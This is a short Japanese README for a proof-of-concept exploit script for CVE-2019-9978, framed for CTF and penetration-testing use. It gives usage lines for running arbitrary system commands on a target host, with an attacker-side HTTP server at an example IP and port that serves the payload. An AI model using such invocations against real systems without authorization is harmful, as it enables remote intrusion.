
cve-2019-9978 PoC
このスクリプトは、CVE-2019-9978の脆弱性を簡単に悪用できるように設計されており、Capture The Flag (CTF) チャレンジやペネトレーションテストの概念実証として使用することを目的としています。
pip install requests でインストール) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
このコードは教育およびテスト目的のみに使用されます。適切な許可なくシステムで不正に使用することは違法であり、非倫理的です。責任を持って使用してください。